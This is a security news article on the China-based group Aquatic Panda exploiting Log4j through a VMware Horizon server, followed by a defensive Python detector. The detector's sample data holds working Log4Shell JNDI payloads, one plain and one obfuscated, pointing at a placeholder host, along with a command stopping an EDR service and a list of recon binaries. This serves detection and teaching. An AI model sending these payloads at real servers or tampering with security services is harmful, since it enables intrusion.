Aquatic Panda, a China-based adversary group, exploited the Log4j vulnerability directly to attack an undisclosed academic institution. The intrusion was detected and disrupted by threat hunters from CrowdStrike's OverWatch team.
According to CrowdStrike, the Chinese state-sponsored actors launched the attack on the unnamed institution through the Log4j vulnerability. The vulnerable component was the affected organization's VMware Horizon instance.
VMware Horizon instance
CrowdStrike's threat hunters spotted the intrusion after observing suspicious activity originating from a Tomcat process running under the affected VMware Horizon instance. They tracked the activity and determined from telemetry that a modified version of the Log4j exploit was being used to gain access to the server. The actors carried out the attack using a public GitHub project that had been published on December 13.
Further monitoring of the intrusion showed that the Aquatic Panda operators used native OS binaries to enumerate privileges and other details of the host and its environment. CrowdStrike's analysts also found that the attackers attempted to stop a third-party endpoint detection and response (EDR) service.
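Two of the observations above are directly detectable by a defender: a Log4j lookup payload arriving in a request header, and a web-server process spawning native OS binaries for reconnaissance or for stopping a service. The following is an added example, not code from the CrowdStrike report or from VMware, showing both checks over constructed data. The access-log lines, the process-creation events, the Horizon service path (ws_TomcatService.exe) and the service name "ExampleEdrSensor" are all assumptions made up for the example; the de-obfuscation covers the nested `${lower:}`, `${upper:}` and `${...:-default}` lookups that modified Log4Shell payloads commonly use, which the text above does not spell out.

```python
import re
from dataclasses import dataclass

# Constructed sample access-log lines (not from the report): a benign request,
# a plain Log4Shell probe in the User-Agent, and an obfuscated probe.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:10:02:17 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [13/Dec/2021:10:02:41 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${::-l}dap://198.51.100.7:1389/b}"',
]

# Innermost ${...} lookup, i.e. one with no further braces inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# JNDI lookup followed by one of the schemes Log4j will actually resolve.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|nis|http)", re.IGNORECASE)


def _resolve_one(body):
    """Collapse one Log4j lookup body to the literal text the attacker intends."""
    if ":-" in body:                        # ${anything:-default} -> default
        return body.split(":-", 1)[1]
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    return "${" + body + "}"                # unknown lookup: leave untouched


def normalize_lookups(s, max_rounds=16):
    """Unwrap nested lookups from the inside out until nothing changes, so
    '${${lower:j}ndi:...}' reduces to '${jndi:...}'. Log4j lower-cases the
    lookup prefix itself, so callers should match case-insensitively."""
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve_one(m.group(1)), s)
        if new == s:
            break
        s = new
    return s


def find_jndi_lookups(lines):
    """Return (1-based line number, scheme) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _JNDI.search(normalize_lookups(line))
        if m:
            hits.append((n, m.group(1).lower()))
    return hits


@dataclass
class ProcEvent:
    parent_image: str
    child_image: str
    command_line: str


# Image names a Horizon/Tomcat web tier runs as (assumed list).
WEB_SERVER_IMAGES = {"ws_tomcatservice.exe", "tomcat9.exe", "java.exe", "javaw.exe"}
# Native binaries a web server has no business spawning (assumed list).
LOLBIN_IMAGES = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "whoami.exe", "net.exe", "net1.exe",
    "ipconfig.exe", "systeminfo.exe", "tasklist.exe", "wmic.exe", "sc.exe",
    "taskkill.exe", "certutil.exe", "bitsadmin.exe",
}
# Command lines that stop, delete or reconfigure a service or kill a process.
_TAMPER = re.compile(
    r"\b(?:sc(?:\.exe)?\s+(?:stop|delete|config)|net(?:1|\.exe)?\s+stop|taskkill(?:\.exe)?\s)",
    re.IGNORECASE,
)

# Constructed process-creation events modelled on the behaviour described above.
# Paths and the service name are assumptions, not details from the report.
_HORIZON = r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe"
SAMPLE_PROC_EVENTS = [
    ProcEvent(_HORIZON, r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami && hostname"),
    ProcEvent(_HORIZON, r"C:\Windows\System32\sc.exe", "sc.exe stop ExampleEdrSensor"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ProcEvent(_HORIZON, r"C:\Windows\System32\conhost.exe", "conhost.exe 0x4"),
]


def triage_process_events(events):
    """Flag children of the web-server process that are recon/shell binaries or
    that try to tamper with a service. Returns (event index, [tags])."""
    findings = []
    for i, ev in enumerate(events):
        parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
        child = ev.child_image.rsplit("\\", 1)[-1].lower()
        if parent not in WEB_SERVER_IMAGES:
            continue                        # an interactive user running whoami is not our signal
        tags = []
        if child in LOLBIN_IMAGES:
            tags.append("lolbin_from_web_server")
        if _TAMPER.search(ev.command_line):
            tags.append("service_tamper")
        if tags:
            findings.append((i, tags))
    return findings


if __name__ == "__main__":
    print(find_jndi_lookups(SAMPLE_ACCESS_LOG))
    print(triage_process_events(SAMPLE_PROC_EVENTS))
```

The process-tree check keys on the parent rather than on the child alone: `whoami` from explorer.exe is noise, `whoami` from the Horizon Tomcat service is the post-exploitation reconnaissance the report describes, and a service-stop command from that same parent is the EDR-tampering attempt. The lookup normalizer is deliberately a fixed-point loop rather than a single regex, because a single `${jndi:` pattern misses exactly the modified payloads that matter.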
OverWatch analysts continued to monitor the attackers' activity and kept the affected organization informed as the intrusion unfolded. The academic institution was able to act on this information and take the appropriate steps to contain the intrusion and patch the vulnerable application.
Aquatic Panda hackers
The China-based Aquatic Panda group has been active since May 2020. Its operators focus on intelligence collection and industrial espionage. The group has primarily targeted companies in the telecommunications and technology sectors as well as government organizations.
The group relies on the Cobalt Strike toolset, including a custom Cobalt Strike downloader tracked as FishMaster. It has also been observed delivering njRAT payloads to achieve its objectives.
Monitoring for Log4j is essential
In light of this incident, CrowdStrike stated that the Log4j vulnerability remains a very serious threat, and that companies and organizations would do well to keep monitoring their environments for exploitation attempts and to patch the affected systems against this vulnerability.